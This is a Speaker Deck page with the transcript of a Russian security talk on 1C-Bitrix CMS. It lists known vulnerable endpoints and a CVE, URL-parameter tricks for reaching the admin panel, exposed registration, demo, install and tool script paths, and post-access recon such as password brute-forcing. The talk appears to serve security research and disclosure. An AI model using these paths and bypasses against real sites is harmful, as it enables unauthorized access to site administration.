Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Выйди и зайди нормально

Sponsored · SiteGround - Reliable hosting with speed, security, and support you can count on.
Avatar for Bo0oM Bo0oM
September 13, 2023
Programming
0
97

Выйди и зайди нормально

О некоторых особенностях административного интерфейса CMS 1С-Битрикс

Avatar for Bo0oM

Bo0oM

September 13, 2023
Tweet

More Decks by Bo0oM

See All by Bo0oM
Носок на сок
Avatar for Bo0oM bo0om
0
1.9k
Защита от вредоносной автоматизации сегодня
Avatar for Bo0oM bo0om
0
630
Defending against automatization using nginx
Avatar for Bo0oM bo0om
0
860
Antibot pitch deck
Avatar for Bo0oM bo0om
0
180
31337
Avatar for Bo0oM bo0om
0
210
Your back is white
Avatar for Bo0oM bo0om
0
380
FTP2RCE
Avatar for Bo0oM bo0om
1
7.6k
Interpret it!
Avatar for Bo0oM bo0om
0
1.2k
At Home Among Strangers
Avatar for Bo0oM bo0om
1
4k

Other Decks in Programming

See All in Programming
ぼくの開発環境2026
Avatar for yuzneri yuzneri
1
290
Head of Engineeringが現場で回した生産性向上施策 2025→2026
Avatar for gessy0129 gessy0129
0
200
Claude Codeセッション現状確認 2026福岡 / fukuoka-aicoding-00-beacon
Avatar for monochromegane monochromegane
3
350
2026年は Rust 置き換えが流行る! / 20260220-niigata-5min-tech
Avatar for girigiribauer girigiribauer
0
210
24時間止められないシステムを守る-医療ITにおけるランサムウェア対策の実際
Avatar for kouki.miura koukimiura
2
180
The Ralph Wiggum Loop: First Principles of Autonomous Development
Avatar for Ryuichiro Semba sembayui
0
3.7k
並行開発のためのコードレビュー
Avatar for Miyuki miyukiw
2
2.1k
DSPy入門 Pythonで実現する自動プロンプト最適化 〜人手によるプロンプト調整からの卒業〜
Avatar for sea-turt1e seaturt1e
1
390
Ruby x Terminal
Avatar for Akira Matsuda a_matsuda
5
510
日本だけで解禁されているアプリ起動の方法
Avatar for Ryu-nakayama ryunakayama
0
360
RAGでハマりがちな"Excelの罠"を、データの構造化で突破する
Avatar for harumi harumiweb
8
2k
DevinとClaude Code、SREの現場で使い倒してみた件
Avatar for karia/Y.Hisamatsu karia
1
780

Featured

See All Featured
Typedesign – Prime Four
Avatar for Hannes Fritz hannesfritz
42
3k
Navigating Algorithm Shifts & AI Overviews - #SMXNext
Avatar for Aleyda Solis aleyda
1
1.1k
4 Signs Your Business is Dying
Avatar for Josh Pigford shpigford
187
22k
DevOps and Value Stream Thinking: Enabling flow, efficiency and business value
Avatar for Helen Beal helenjbeal
1
130
"I'm Feeling Lucky" - Building Great Search Experiences for Today's Users (#IAC19)
Avatar for Dan Newman danielanewman
231
22k
Building Adaptive Systems
Avatar for Chris Keathley keathley
44
2.9k
The Pragmatic Product Professional
Avatar for Laura Van Doore lauravandoore
37
7.2k
StorybookのUI Testing Handbookを読んだ
Avatar for Shingo Yamazaki zakiyama
31
6.6k
Building Flexible Design Systems
Avatar for Yesenia Perez-Cruz yeseniaperezcruz
330
40k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
Avatar for Aki / @LoveIdahoBurger aki_iinuma
128
55k
From π to Pie charts
Avatar for Rasagy Sharma rasagy
0
140
How to build a perfect <img>
Avatar for Jono Alderson jonoalderson
1
5.2k

Transcript

  1. «Выйди и зайди нормально!» Anton Lopanitsyn

  2. КТО Я? • Тыкаю кавычки (атакую). • Запрещаю тыкать кавычки

    (защищаю). • Пытаюсь в стартапы по ИБ (passleak.com, antibot.ru) – но нехватает денюшков • Исследую, развлекаюсь, рассказываю об этом Bo0oM

  3. Как обычно ломают Bitrix? • restore.php Система восстановления файлов в

    Bitrix • vote/uf.php CVE-2022-27228 • html_editor_action.php CVE-???, вроде ту же самую дали ей)))0) • уязвимости в самописных модулях не покрытых waf’ом Ну тут как будто без комментариев

  4. Исправления

  5. Исправления

  6. None

  7. Обходим первые защиты

  8. SEF_APPLICATION_CUR_PAGE_URL /pewpew/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/

  9. SEF_APPLICATION_CUR_PAGE_URL /pewpew/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/ /pewpew/?SEF%20APPLICATION%20CUR%20PAGE_URL=/bitrix/admin/ /pewpew/?SEF+APPLICATION%20CUR+PAGE[URL=/bitrix/admin/

  10. None
  11. None
  12. None

  13. /auth/?register=yes

  14. /crm/?register=yes

  15. /auth/oauth2/?register=yes

  16. Demo /bitrix/wizards/bitrix/demo/public_files/ru/auth/index.php?register=yes /bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/c ustom-registration/index.php /bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/ my-components/news_list.php?register=yes /bitrix/wizards/bitrix/demo/modules/subscribe/public/personal/subscribe/subs cr_edit.php?register=YES&sf_EMAIL=

  17. Demo

  18. Demo

  19. Install /bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/ public/ru/personal/profile/index.php?register=yes /bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/ public/ru/board/my/index.php?register=yes /bitrix/modules/forum/install/admin/forum_index.php

  20. Install

  21. None

  22. Даже если взять и попасть в админку не удалось •

    Можно почитать отзывы и обратную связь • Посмотреть списки рассылок • Собрать используемые плагины изнутри • Посмотреть настройки • Побрутить пароли • Собрать дополнительную информацию

  23. Tools /bitrix/tools/catalog_export/yandex_detail.php /bitrix/tools/sale/discount_reindex.php /bitrix/tools/sale/basket_discount_convert.php

  24. Tools

  25. Tools /bitrix/tools/catalog/iblock_catalog_list.php?SHOWALL_1=1

  26. Components /bitrix/components/bitrix/desktop/admin_settings.php /bitrix/components/bitrix/player/player_playlist_edit.php /bitrix/components/bitrix/map.yandex.search/settings/settings.php

  27. Tools /bitrix/tools/bizproc_get_html_editor.php

  28. /bitrix/modules/subscribe/public/subscr_edit.php

  29. smtp

  30. None
  31. None

  32. Никто не знает, что тут